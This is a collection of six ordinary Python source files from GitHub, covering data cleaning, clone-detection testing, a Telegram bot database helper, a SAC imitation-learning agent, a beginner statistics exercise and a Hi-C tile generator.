+{"seq_id":"2289031862","text":"import sys\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\ndef load_data(messages_filepath, categories_filepath):\n \"\"\" Loading the messages & categories file from the data folder using pandas read_csv\"\"\"\n messages = pd.read_csv(messages_filepath)\n categories = pd.read_csv(categories_filepath)\n df = messages.merge(categories,on='id',how='outer')\n return df\n \n\ndef clean_data(df):\n \"\"\"This function will clean the data by doing the following:\n 1. Extract column names from Categories column\n 2. Convert categories to binary\n 3. Concatenate with messages dataframe\n Returns: (DataFrame) \"\"\"\n # print(df.head())\n categories = df['categories'].str.split(';',expand=True)\n\n # select the first row of the categories dataframe\n row = categories.loc[0]\n\n # use this row to extract a list of new column names for categories.\n # one way is to apply a lambda function that takes everything \n # up to the second to last character of each string with slicing\n category_colnames = []\n for col in row:\n category_colnames.append(col.split('-')[0])\n \n # rename the columns of `categories`\n categories.columns = category_colnames\n\n for column in categories:\n # set each value to be the last character of the string\n categories[column] = [row[-1] for row in categories[column]]\n # convert column from string to numeric\n categories[column] = [int(row) for row in categories[column]]\n #related column has 3 values 0,1,2. So removed rows which have value 2\n categories['related'] = categories['related'][categories['related'] != 2]\n \n df.drop(['categories'],axis = 1, inplace= True)\n df = pd.concat([df,categories],axis = 1)\n df.drop_duplicates(inplace = True)\n return df\n\ndef save_data(df, database_filename):\n \"\"\"This function will save the DataFrame to a DB Table\"\"\"\n engine = create_engine(f'sqlite:///{database_filename}')\n df.to_sql('clean_table', engine, index=False,if_exists='replace')\n\n\ndef main():\n if len(sys.argv) == 4:\n\n messages_filepath, categories_filepath, database_filepath = sys.argv[1:]\n\n print('Loading data...\\n MESSAGES: {}\\n CATEGORIES: {}'\n .format(messages_filepath, categories_filepath))\n df = load_data(messages_filepath, categories_filepath)\n\n print('Cleaning data...')\n df = clean_data(df)\n \n print('Saving data...\\n DATABASE: {}'.format(database_filepath))\n save_data(df, database_filepath)\n \n print('Cleaned data saved to database!')\n \n else:\n print('Please provide the filepaths of the messages and categories '\\\n 'datasets as the first and second argument respectively, as '\\\n 'well as the filepath of the database to save the cleaned data '\\\n 'to as the third argument. \\n\\nExample: python process_data.py '\\\n 'disaster_messages.csv disaster_categories.csv '\\\n 'DisasterResponse.db')\n\n\nif __name__ == '__main__':\n main()","repo_name":"syedroshanzameer/udacity-ds","sub_path":"data/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29580399959","text":"import logging\nfrom typing import *\n\nimport pandas\nimport torch\nfrom torch.utils import data\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torcheval import metrics\nfrom tqdm import tqdm\n\nimport register\nfrom BCB_model import Trainer\nfrom detecter import module_tools\nfrom detecter.dataset import PairCodeset, collate_fn\n\n\ndef test(\n model_name: str,\n use_tpe: bool = False,\n max_node_count: int = None,\n prune_node_count: int = None,\n batch_size: int = 32,\n threshold: float = 0.5,\n):\n logger = logging.getLogger(\"BCBtest\")\n logger.setLevel(logging.DEBUG)\n fh = logging.FileHandler(\"log/{}.test.log\".format(model_name), mode=\"a+\")\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(logging.Formatter(\"[%(asctime)s:%(levelname)s] - %(message)s\"))\n logger.addHandler(fh)\n\n test_ds = PairCodeset(\n pandas.read_pickle(\"dataset/BigCloneBench/data.jsonl.txt.bin\"),\n pandas.read_pickle(\"dataset/BigCloneBench/test.txt.bin\"),\n )\n test_ds.drop(max_node_count).prune(prune_node_count).use_tpe(use_tpe).sample(50000)\n test_loader = data.DataLoader(test_ds, batch_size=batch_size, num_workers=4, pin_memory=True, collate_fn=collate_fn)\n\n model = module_tools.get_module(model_name).cuda()\n evaluators: Dict[str, metrics.Metric] = {\n \"f1\": metrics.BinaryF1Score(device=\"cuda\", threshold=threshold),\n \"precision\": metrics.BinaryPrecision(device=\"cuda\", threshold=threshold),\n \"recall\": metrics.BinaryRecall(device=\"cuda\", threshold=threshold),\n \"accuracy\": metrics.BinaryAccuracy(device=\"cuda\", threshold=threshold),\n }\n pr_curve = metrics.BinaryPrecisionRecallCurve(device=\"cuda\")\n\n model.eval().cuda()\n with torch.inference_mode():\n for idx, batch in enumerate(tqdm(test_loader, desc=\"TEST\")):\n label, nodes, dist = [item.cuda() for item in batch]\n score = torch.sigmoid(model(nodes, dist))\n\n for evaluator in evaluators.values():\n evaluator.update(score, label.long())\n pr_curve.update(score, label.long())\n\n if idx % 100 == 0:\n logger.debug(\n \"test: \"\n + \", \".join([\"{} {:.4f}\".format(key, evaluator.compute()) for key, evaluator in evaluators.items()])\n )\n print(\"test: \" + \", \".join([\"{} {:.4f}\".format(key, evaluator.compute()) for key, evaluator in evaluators.items()]))\n\n pcurve, rcurve, threshold = pr_curve.compute()\n f1curve = 2 / (1 / pcurve + 1 / rcurve)\n max_id = f1curve.argmax()\n print(\n \"f1 {:.4f}, precision {:.4f}, recall {:.4f}, threshold {:.4f}\".format(\n f1curve[max_id], pcurve[max_id], rcurve[max_id], threshold[max_id]\n )\n )\n\n df = pandas.DataFrame(\n data={\n \"precision\": pcurve.tolist(),\n \"recall\": rcurve.tolist(),\n \"f1\": f1curve.tolist(),\n }\n )\n df.to_csv(\"log/prcurve.csv\")\n\n\nif __name__ == \"__main__\":\n # test(\"BCBdetecter_no_mask\")\n # test(\"BCBdetecter\")\n test(\"BCBdetecter\", use_tpe=True, prune_node_count=1280, batch_size=16, threshold=0.76)\n","repo_name":"ya-hong/AST-clone-detection","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"6823053923","text":"from pymongo import MongoClient, ReturnDocument\nimport pymongo\nimport envreader\nimport datetime\nimport logging\n\nclient = MongoClient(envreader.get_var(\"MONGO_DB_URI\"))\n\ndb = client[\"users\"]\n\nlogging.basicConfig(\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO\n)\n\npayment_schema = {\n 'date': {\n \"type\": str,\n \"required\": True\n },\n 'amount': {\n \"type\": str,\n \"required\": True\n }\n}\n\nuser_schema = {\n 'handle': {\n \"type\": str,\n \"required\": True\n },\n 'tg_id': {\n \"type\": str,\n \"required\": True\n },\n 'balance': {\n \"type\": int,\n \"required\": True\n },\n 'history':{\n \"type\": payment_schema\n }\n}\n\n# Lisää uuden käyttäjän kantaan\n# user_id: Telegramin käyttäjä. Tyyppi: telegram.User\n# return: Käyttäjän _id string, tyhjä string jos virhe\ndef new_user(user):\n newUser = {\n 'handle': user.username,\n \"tg_id\": user.id,\n \"balance\": 0,\n \"history\": []\n }\n try:\n return db.users.insert_one(newUser).inserted_id\n except:\n print(\"virhe tietokannassa\")\n return \"\"\n\n#Etsii yhden käyttäjän\n#user_id: Telegramin käyttäjän id string\n#return: Käyttäjän tiedot\ndef find_user(user_id):\n return db.users.find_one({\"tg_id\":user_id})\n\n#Lisää käyttäjälle uuden maksun (eli piikkiä ostettu)\n#user_id: Telegramin käyttäjän id string\n#amount: Maksun määrä\n#return: Päivitetty dokumentti tai None jos virhe\ndef new_payment(user_id, amount):\n user = find_user(user_id)\n if(user == None):\n return False\n payment_obj = {\n \"date\": datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"),\n \"amount\": amount\n }\n user[\"history\"].append(payment_obj)\n user[\"balance\"] += amount\n return db.users.find_one_and_update({\"tg_id\":user_id}, {\"$set\": user}, return_document=ReturnDocument.AFTER, upsert=True)\n\n#Etsii kaikki käyttjät\n#return: lista kaikista käyttäjistä\ndef get_all_users():\n return list(db.users.find())\n\n#Lisää uuden ostoksen käyttäjälle\n#user_id: Telegramin käyttäjän id string\n#amount: Ostoksen määrä\n#return: Päivitetty dokumentti tai None jos virhe\ndef new_purchase(user_id, amount):\n user = find_user(user_id)\n if(user == None):\n return False\n payment_obj = {\n \"date\": datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"),\n \"amount\": amount\n }\n user[\"history\"].append(payment_obj)\n user[\"balance\"] += amount \n return db.users.find_one_and_update({\"tg_id\":user_id}, {\"$set\": user}, return_document=ReturnDocument.AFTER, upsert=True)","repo_name":"JokisAtte/E-Bot","sub_path":"src/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"fi","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"8561713813","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import autograd\nfrom torch import distributions as torchd\n\nfrom utils_folder import utils\nfrom utils_folder.utils import SquashedNormal\nfrom utils_folder.utils_dreamer import Bernoulli\n\n\nclass Discriminator(nn.Module):\n def __init__(self, input_dim, hidden_dim, hidden_depth, dist=None):\n super().__init__()\n\n self.dist = dist\n self._shape = (1,)\n \n output_dim = 1\n self.trunk = utils.mlp(input_dim, hidden_dim, output_dim, hidden_depth)\n\n self.outputs = dict()\n self.apply(utils.weight_init)\n \n def forward(self, transition):\n d = self.trunk(transition)\n if self.dist == 'binary':\n return Bernoulli(torchd.independent.Independent(torchd.bernoulli.Bernoulli(logits=d), len(self._shape)))\n else:\n return d \n\nclass DiagGaussianActor(nn.Module):\n \"\"\"torch.distributions implementation of an diagonal Gaussian policy.\"\"\"\n def __init__(self, obs_dim, action_dim, hidden_dim, hidden_depth,\n log_std_bounds):\n super().__init__()\n\n self.log_std_bounds = log_std_bounds\n self.trunk = utils.mlp(obs_dim, hidden_dim, 2 * action_dim,\n hidden_depth)\n\n self.outputs = dict()\n self.apply(utils.weight_init)\n\n def forward(self, obs):\n mu, log_std = self.trunk(obs).chunk(2, dim=-1)\n\n # constrain log_std inside [log_std_min, log_std_max]\n log_std = torch.tanh(log_std)\n log_std_min, log_std_max = self.log_std_bounds\n log_std = log_std_min + 0.5 * (log_std_max - log_std_min) * (log_std +\n 1)\n\n std = log_std.exp()\n\n self.outputs['mu'] = mu\n self.outputs['std'] = std\n\n dist = SquashedNormal(mu, std)\n return dist\n\n def log(self, logger, step):\n for k, v in self.outputs.items():\n logger.log_histogram(f'train_actor/{k}_hist', v, step)\n\n for i, m in enumerate(self.trunk):\n if type(m) == nn.Linear:\n logger.log_param(f'train_actor/fc{i}', m, step)\n\n\nclass DoubleQCritic(nn.Module):\n \"\"\"Critic network, employes double Q-learning.\"\"\"\n def __init__(self, obs_dim, action_dim, hidden_dim, hidden_depth):\n super().__init__()\n\n self.Q1 = utils.mlp(obs_dim + action_dim, hidden_dim, 1, hidden_depth)\n self.Q2 = utils.mlp(obs_dim + action_dim, hidden_dim, 1, hidden_depth)\n\n self.outputs = dict()\n self.apply(utils.weight_init)\n\n def forward(self, obs, action):\n assert obs.size(0) == action.size(0)\n\n obs_action = torch.cat([obs, action], dim=-1)\n q1 = self.Q1(obs_action)\n q2 = self.Q2(obs_action)\n\n self.outputs['q1'] = q1\n self.outputs['q2'] = q2\n\n return q1, q2\n\n def log(self, logger, step):\n for k, v in self.outputs.items():\n logger.log_histogram(f'train_critic/{k}_hist', v, step)\n\n assert len(self.Q1) == len(self.Q2)\n for i, (m1, m2) in enumerate(zip(self.Q1, self.Q2)):\n assert type(m1) == type(m2)\n if type(m1) is nn.Linear:\n logger.log_param(f'train_critic/q1_fc{i}', m1, step)\n logger.log_param(f'train_critic/q2_fc{i}', m2, step)\n\nclass SAC_Agent:\n \"\"\"SAC algorithm.\"\"\"\n def __init__(self, obs_dim, action_dim, action_range, device, hidden_dim,\n hidden_depth, discount, init_temperature, alpha_lr, alpha_betas,\n actor_lr, actor_betas, actor_update_frequency, critic_lr,\n critic_betas, critic_tau, critic_target_update_frequency,\n batch_size, learnable_temperature, log_std_bounds,\n reward_d_coef, discriminator_lr, GAN_loss='bce', from_dem=False):\n\n self.action_range = action_range\n self.device = torch.device(device)\n self.discount = discount\n self.critic_tau = critic_tau\n self.actor_update_frequency = actor_update_frequency\n self.critic_target_update_frequency = critic_target_update_frequency\n self.batch_size = batch_size\n self.learnable_temperature = learnable_temperature\n self.GAN_loss = GAN_loss\n self.from_dem = from_dem\n\n self.critic = DoubleQCritic(obs_dim, action_dim, hidden_dim, hidden_depth).to(self.device)\n self.critic_target = DoubleQCritic(obs_dim, action_dim, hidden_dim, hidden_depth).to(self.device)\n self.critic_target.load_state_dict(self.critic.state_dict())\n\n self.actor = DiagGaussianActor(obs_dim, action_dim, hidden_dim, \n hidden_depth, log_std_bounds).to(self.device)\n\n self.log_alpha = torch.tensor(np.log(init_temperature)).to(self.device)\n self.log_alpha.requires_grad = True\n # set target entropy to -|A|\n self.target_entropy = -action_dim\n\n # added model\n if from_dem:\n if self.GAN_loss == 'least-square':\n self.discriminator = Discriminator(obs_dim + action_dim, hidden_dim, hidden_depth).to(device)\n self.reward_d_coef = reward_d_coef\n\n elif self.GAN_loss == 'bce':\n self.discriminator = Discriminator(obs_dim + action_dim, hidden_dim, hidden_depth, dist='binary').to(device)\n\n else:\n NotImplementedError\n\n else:\n if self.GAN_loss == 'least-square':\n self.discriminator = Discriminator(2*obs_dim, hidden_dim, hidden_depth).to(device)\n self.reward_d_coef = reward_d_coef\n\n elif self.GAN_loss == 'bce':\n self.discriminator = Discriminator(2*obs_dim, hidden_dim, hidden_depth, dist='binary').to(device)\n\n else:\n NotImplementedError\n\n # optimizers\n self.actor_optimizer = torch.optim.Adam(self.actor.parameters(),\n lr=actor_lr,\n betas=actor_betas)\n\n self.critic_optimizer = torch.optim.Adam(self.critic.parameters(),\n lr=critic_lr,\n betas=critic_betas)\n\n self.log_alpha_optimizer = torch.optim.Adam([self.log_alpha],\n lr=alpha_lr,\n betas=alpha_betas)\n\n self.discriminator_optimizer = torch.optim.Adam(self.discriminator.parameters(), \n lr=discriminator_lr)\n\n self.train()\n self.critic_target.train()\n \n def reset(self):\n \"\"\"For state-full agents this function performs reseting at the beginning of each episode.\"\"\"\n pass\n\n def train(self, training=True):\n self.training = training\n self.actor.train(training)\n self.critic.train(training)\n self.discriminator.train(training)\n\n @property\n def alpha(self):\n return self.log_alpha.exp()\n\n def act(self, obs, step, eval_mode):\n obs = torch.FloatTensor(obs).to(self.device)\n obs = obs.unsqueeze(0)\n dist = self.actor(obs)\n action = dist.sample() if not eval_mode else dist.mean\n action = action.clamp(*self.action_range)\n assert action.ndim == 2 and action.shape[0] == 1\n return utils.to_np(action[0])\n\n def update_critic(self, obs, action, reward, next_obs, not_done, logger,\n step):\n\n dist = self.actor(next_obs)\n next_action = dist.rsample()\n log_prob = dist.log_prob(next_action).sum(-1, keepdim=True)\n target_Q1, target_Q2 = self.critic_target(next_obs, next_action)\n target_V = torch.min(target_Q1,\n target_Q2) - self.alpha.detach() * log_prob\n target_Q = reward + (not_done * self.discount * target_V)\n target_Q = target_Q.detach()\n\n # get current Q estimates\n current_Q1, current_Q2 = self.critic(obs, action)\n critic_loss = F.mse_loss(current_Q1, target_Q) + F.mse_loss(current_Q2, target_Q)\n logger.log('train_critic/loss', critic_loss, step)\n\n # Optimize the critic\n self.critic_optimizer.zero_grad()\n critic_loss.backward()\n self.critic_optimizer.step()\n\n self.critic.log(logger, step)\n\n def update_actor_and_alpha(self, obs, logger, step):\n dist = self.actor(obs)\n action = dist.rsample()\n log_prob = dist.log_prob(action).sum(-1, keepdim=True)\n actor_Q1, actor_Q2 = self.critic(obs, action)\n\n actor_Q = torch.min(actor_Q1, actor_Q2)\n actor_loss = (self.alpha.detach() * log_prob - actor_Q).mean()\n\n logger.log('train_actor/loss', actor_loss, step)\n logger.log('train_actor/target_entropy', self.target_entropy, step)\n logger.log('train_actor/entropy', -log_prob.mean(), step)\n\n # optimize the actor\n self.actor_optimizer.zero_grad()\n actor_loss.backward()\n self.actor_optimizer.step()\n\n self.actor.log(logger, step)\n\n if self.learnable_temperature:\n self.log_alpha_optimizer.zero_grad()\n alpha_loss = (self.alpha *\n (-log_prob - self.target_entropy).detach()).mean()\n logger.log('train_alpha/loss', alpha_loss, step)\n logger.log('train_alpha/value', self.alpha, step)\n alpha_loss.backward()\n self.log_alpha_optimizer.step()\n\n def compute_reward(self, obs_a, next_a, logger, step):\n \n with torch.no_grad():\n self.discriminator.eval()\n transition_a = torch.cat([obs_a, next_a], dim=-1)\n d = self.discriminator(transition_a)\n\n if self.GAN_loss == 'least-square':\n reward_d = self.reward_d_coef * torch.clamp(1 - (1/4) * torch.square(d - 1), min=0)\n\n elif self.GAN_loss == 'bce':\n reward_d = d.mode()\n\n reward = reward_d\n\n logger.log('train_discriminator/reward_d', reward_d.mean(), step)\n logger.log('train_discriminator/reward', reward.mean(), step)\n \n self.discriminator.train()\n \n return reward\n\n def compute_discriminator_grad_penalty_LS(self, obs_e, next_e, lambda_=10):\n \n expert_data = torch.cat([obs_e, next_e], dim=-1)\n expert_data.requires_grad = True\n \n d = self.discriminator.trunk(expert_data)\n ones = torch.ones(d.size(), device=self.device)\n grad = autograd.grad(outputs=d, inputs=expert_data, grad_outputs=ones, create_graph=True,\n retain_graph=True, only_inputs=True)[0]\n \n grad_pen = lambda_ * (grad.norm(2, dim=1) - 0).pow(2).mean()\n \n return grad_pen\n\n def compute_discriminator_grad_penalty_bce(self, obs_a, next_a, obs_e, next_e, lambda_=10):\n\n agent_feat = torch.cat([obs_a, next_a], dim=-1)\n alpha = torch.rand(agent_feat.shape[:1]).unsqueeze(-1).to(self.device)\n expert_data = torch.cat([obs_e, next_e], dim=-1)\n disc_penalty_input = alpha*agent_feat + (1-alpha)*expert_data\n\n disc_penalty_input.requires_grad = True\n d = self.discriminator(disc_penalty_input).mode()\n ones = torch.ones(d.size(), device=self.device)\n grad = autograd.grad(outputs=d, inputs=disc_penalty_input, grad_outputs=ones, create_graph=True,\n retain_graph=True, only_inputs=True)[0]\n \n grad_pen = lambda_ * (grad.norm(2, dim=1) - 1).pow(2).mean()\n return grad_pen\n \n def update_discriminator(self, obs_a, next_a, obs_e, next_e, logger, step):\n \n transition_a = torch.cat([obs_a, next_a], dim=-1)\n transition_e = torch.cat([obs_e, next_e], dim=-1)\n \n agent_d = self.discriminator(transition_a)\n expert_d = self.discriminator(transition_e)\n\n if self.GAN_loss == 'least-square':\n expert_loss = F.mse_loss(expert_d, torch.ones(expert_d.size(), device=self.device))\n agent_loss = F.mse_loss(agent_d, -1*torch.ones(agent_d.size(), device=self.device))\n grad_pen_loss = self.compute_discriminator_grad_penalty_LS(obs_e, next_e)\n loss = 0.5*(expert_loss + agent_loss) + grad_pen_loss\n\n elif self.GAN_loss == 'bce':\n expert_loss = (expert_d.log_prob(torch.ones_like(expert_d.mode()).to(self.device))).mean()\n agent_loss = (agent_d.log_prob(torch.zeros_like(agent_d.mode()).to(self.device))).mean()\n grad_pen_loss = self.compute_discriminator_grad_penalty_bce(obs_a.detach(), next_a.detach(), obs_e.detach(), next_e.detach())\n loss = -(expert_loss+agent_loss) + grad_pen_loss\n\n logger.log('train_discriminator/expert_loss', expert_loss, step)\n logger.log('train_discriminator/agent_loss', agent_loss, step)\n logger.log('train_discriminator/grad_pen_loss', grad_pen_loss, step)\n logger.log('train_discriminator/loss', loss, step)\n \n # optimize inverse models\n self.discriminator_optimizer.zero_grad(set_to_none=True)\n loss.backward()\n self.discriminator_optimizer.step() \n\n def update(self, replay_buffer, replay_buffer_expert, logger, step):\n\n obs, action, reward_a, next_obs, not_done, not_done_no_max = replay_buffer.sample(self.batch_size)\n obs_e, action_e, _, next_obs_e, _, _ = replay_buffer_expert.sample(self.batch_size)\n\n if self.from_dem:\n self.update_discriminator(obs, action, obs_e, action_e, logger, step)\n reward = self.compute_reward(obs, action, logger, step)\n\n else:\n self.update_discriminator(obs, next_obs, obs_e, next_obs_e, logger, step)\n reward = self.compute_reward(obs, next_obs, logger, step)\n\n logger.log('train/batch_reward_agent_only', reward_a.mean(), step)\n logger.log('train/batch_reward', reward.mean(), step)\n\n self.update_critic(obs, action, reward, next_obs, not_done_no_max, logger, step)\n\n if step % self.actor_update_frequency == 0:\n self.update_actor_and_alpha(obs, logger, step)\n\n if step % self.critic_target_update_frequency == 0:\n utils.soft_update_params(self.critic, self.critic_target,\n self.critic_tau)\n","repo_name":"VittorioGiammarino/AIL_from_visual_obs","sub_path":"agents/sac_w_expert_MDP.py","file_name":"sac_w_expert_MDP.py","file_ext":"py","file_size_in_byte":14513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"72952531600","text":"lstg = []\nlsta = []\nlstcod = []\nwhile True:\n print(15*'=', 'Digite novos dados', 15*'=')\n cod = int(input('Digite seu código de 4 números: '))\n if cod >= 9999:\n print('Valor inválido!!')\n cod = int(input('Digite o código novamente: '))\n lstcod += [cod]\n altura = int(input('Digite sua altura em cm: '))\n lsta += [altura]\n peso = float(input('Digite seu peso em Kg: '))\n lstg += [peso]\n ch = str(input('Deseja continuar? [S/N]: ')).upper()\n if ch not in 'SN':\n while ch not in 'SN':\n ch = str(input('Valor inválido, tente novamente[S/N]: ')).upper()\n if ch == 'N':\n break\n elif ch == 'S':\n continue\nprint(30*'-=')\nprint(f'O codigo dos cliente que participaram do senso é {lstcod} ')\nprint(f'O cliente mais gordo possui Kg {max(lstg):.2f}\\n'\n f'O cliente mais magro possui Kg {min(lstg):.2f}')\nprint(f'O maior cliente possui {max(lsta)/100} metros\\n'\n f'O menor cliente possui {min(lsta)/100} metros')\nprint(30*'-=')\nprint(f'A média de altura entre os clients em metro é {((sum(lsta) / len(lsta))/100):.2f}')\nprint(f'A média de peso entre os clientes é Kg{(sum(lstg) / len(lstg)):.2f}')\n","repo_name":"CarlosDouradoPGR/EstruturaDeRepet","sub_path":"Ex37.py","file_name":"Ex37.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"32769104514","text":"#!/usr/bin/python\n\nimport argparse\nimport clodius.higlass_getter as chg\nimport clodius.save_tiles as cst\nimport collections as col\nimport cooler\nimport h5py\nimport numpy as np\nimport sys\nimport time\n\nimport multiprocessing as mpr\n\n\ndef recursive_generate_tiles(\n tile_positions,\n coolers_matrix,\n info,\n resolution,\n max_zoom_to_generate,\n queue=None,\n max_queue_size=10000,\n):\n \"\"\"\n Recursively generate tiles from a cooler file.\n\n :param tile_position: A 3-tuple containing (zoom_level, x_position, y_position)\n :param filepath: The path of the cooler file\n :param info: The information about the tileset\n :param resolution: The resolution of the data in the smallest tiles (in nucleotides)\n :param max_zoom_to_generate: The maximum zoom level to create tiles for\n :param max_queue_size: The maximum size of the queue (sleep until it shrinks)\n \"\"\"\n total_put = 0\n start_time = time.time()\n\n while len(tile_positions) > 0:\n tile_position = tile_positions.popleft()\n\n zoom_level = tile_position[0]\n x_pos = tile_position[1]\n y_pos = tile_position[2]\n\n divisor = 2 ** zoom_level\n\n start1 = x_pos * info[\"max_width\"] / divisor\n end1 = (x_pos + 1) * info[\"max_width\"] / divisor\n\n start2 = y_pos * info[\"max_width\"] / divisor\n end2 = (y_pos + 1) * info[\"max_width\"] / divisor\n\n t1 = time.time()\n print(\"st:\", start1, end1 - 1, start2, end2 - 1)\n try:\n data = chg.getData3(\n coolers_matrix[zoom_level],\n zoom_level,\n start1,\n end1 - 1,\n start2,\n end2 - 1,\n )\n except ValueError as ve:\n print(\"ERROR ve:\", ve, file=sys.stderr)\n\n data_time = time.time() - t1\n\n if len(data) == 0:\n continue\n\n df = data[data[\"genome_start\"] >= start1]\n binsize = 2 ** (info[\"max_zoom\"] - zoom_level) * resolution\n\n i = (df[\"genome_start\"].values - start1) // binsize\n j = (df[\"genome_end\"].values - start2) // binsize\n v = np.nan_to_num(df[\"balanced\"].values)\n\n zi = zip(zip(i, j), v)\n tile_bins = dict(zi)\n\n data_length = len(data)\n\n if queue is not None:\n total_put += 1\n print(\n \"putting:\",\n (tile_position[0], tile_position[1:]),\n \"total_put:\",\n total_put,\n \"total_time: {:d}\".format(int(time.time() - start_time)),\n \"time_per_put: {:.2f}\".format((time.time() - start_time) / total_put),\n \"data_time: {:.2f}\".format(data_time),\n \"tile_size:\",\n data_length,\n \"call: ({}, {}, {}, {}, {})\".format(\n zoom_level, start1, end1 - 1, start2, end2 - 1\n ),\n \"qsize:\",\n queue.qsize(),\n )\n queue.put((tile_position[0], tile_position[1:], tile_bins))\n while queue.qsize() > max_queue_size:\n time.sleep(0.5)\n ###\n # Upload the tile to the server here\n ###\n if zoom_level < max_zoom_to_generate and data_length > 0:\n tile_positions.append((zoom_level + 1, 2 * x_pos, 2 * y_pos))\n tile_positions.append((zoom_level + 1, 2 * x_pos, 2 * y_pos + 1))\n tile_positions.append((zoom_level + 1, 2 * x_pos + 1, 2 * y_pos + 1))\n tile_positions.append((zoom_level + 1, 2 * x_pos + 1, 2 * y_pos))\n\n # need to recurse into higher zoom levels\n \"\"\"\n recursive_generate_tiles((zoom_level+1, 2 * x_pos, 2 * y_pos), coolers_matrix, info,\n resolution, max_zoom_to_generate, queue = queue)\n recursive_generate_tiles((zoom_level+1, 2 * x_pos, 2 * y_pos + 1), coolers_matrix, info,\n resolution, max_zoom_to_generate, queue = queue)\n recursive_generate_tiles((zoom_level+1, 2 * x_pos + 1, 2 * y_pos + 1), coolers_matrix, info,\n resolution, max_zoom_to_generate, queue = queue)\n recursive_generate_tiles((zoom_level+1, 2 * x_pos + 1, 2 * y_pos), coolers_matrix, info,\n resolution, max_zoom_to_generate, queue = queue)\n \"\"\"\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"\"\"\n python cooler_to_tiles.py cooler_file\n\n Requires the cooler package.\n\"\"\"\n )\n\n # parser.add_argument('argument', nargs=1)\n # parser.add_argument('-o', '--options', default='yo',\n # help=\"Some option\", type='str')\n # parser.add_argument('-u', '--useless', action='store_true',\n # help='Another useless option')\n parser.add_argument(\"filepath\")\n parser.add_argument(\n \"-e\",\n \"--elasticsearch-url\",\n default=None,\n help=\"The url of the elasticsearch database where to save the tiles\",\n )\n parser.add_argument(\n \"-b\",\n \"--bins-per-dimension\",\n default=1,\n help=\"The number of bins to consider in each dimension\",\n type=int,\n )\n parser.add_argument(\n \"-f\",\n \"--columnfile-path\",\n default=None,\n help=\"The path to the column file where to save the tiles\",\n )\n parser.add_argument(\"--assembly\", default=None)\n parser.add_argument(\"--log-file\", default=None)\n parser.add_argument(\"--resolution\", default=1000)\n parser.add_argument(\"--max-zoom\", default=None, type=int)\n parser.add_argument(\"--num-threads\", default=4, type=int)\n\n args = parser.parse_args()\n tileset_info = chg.getInfo(args.filepath)\n\n num_dimensions = 2\n bins_per_dimension = tileset_info[\"bins_per_dimension\"]\n max_data_in_sparse = bins_per_dimension ** num_dimensions / 10\n\n if args.elasticsearch_url is not None:\n tile_saver = cst.ElasticSearchTileSaver(\n max_data_in_sparse,\n bins_per_dimension,\n es_path=args.elasticsearch_url,\n log_file=args.log_file,\n num_dimensions=num_dimensions,\n )\n else:\n tile_saver = cst.ColumnFileTileSaver(\n max_data_in_sparse,\n bins_per_dimension,\n file_path=args.columnfile_path,\n log_file=args.log_file,\n num_dimensions=num_dimensions,\n )\n\n ############################################################################\n\n if args.max_zoom is not None and args.max_zoom < tileset_info[\"max_zoom\"]:\n max_zoom_to_generate = args.max_zoom\n else:\n max_zoom_to_generate = tileset_info[\"max_zoom\"]\n\n coolers_matrix = {}\n queue = mpr.Queue()\n\n tilesaver_processes = []\n finished = mpr.Value(\"b\", False)\n\n print(\"num_threads:\", args.num_threads)\n for i in range(args.num_threads):\n p = mpr.Process(\n target=cst.tile_saver_worker, args=(queue, tile_saver, finished)\n )\n\n p.daemon = True\n p.start()\n tilesaver_processes += [(tile_saver, p)]\n\n tileset_info[\"max_value\"] = 0\n tileset_info[\"min_value\"] = 0\n\n tile_saver.save_tile({\"tile_id\": \"tileset_info\", \"tile_value\": tileset_info})\n tile_saver.flush()\n\n try:\n with h5py.File(args.filepath) as f:\n for i in range(max_zoom_to_generate + 1):\n f = h5py.File(args.filepath, \"r\")\n\n c = cooler.Cooler(f[str(i)])\n matrix = c.matrix(balance=True, as_pixels=True, join=True)\n\n coolers_matrix[i] = {\"cooler\": c, \"matrix\": matrix}\n\n recursive_generate_tiles(\n col.deque([(0, 0, 0)]),\n coolers_matrix,\n tileset_info,\n args.resolution,\n max_zoom_to_generate,\n queue,\n )\n except KeyboardInterrupt:\n print(\"kb interrupt:\")\n for (ts, p) in tilesaver_processes:\n p.terminate()\n p.join()\n print(\"finished\")\n raise\n\n finished.value = True\n # wait for the worker processes to finish\n for (ts, p) in tilesaver_processes:\n p.join()\n\n print(\"tileset_info:\", tileset_info)\n tile_saver.save_tile({\"tile_id\": \"tileset_info\", \"tile_value\": tileset_info})\n tile_saver.flush()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"higlass/clodius","sub_path":"scripts/cooler_to_tiles.py","file_name":"cooler_to_tiles.py","file_ext":"py","file_size_in_byte":8266,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"3"}
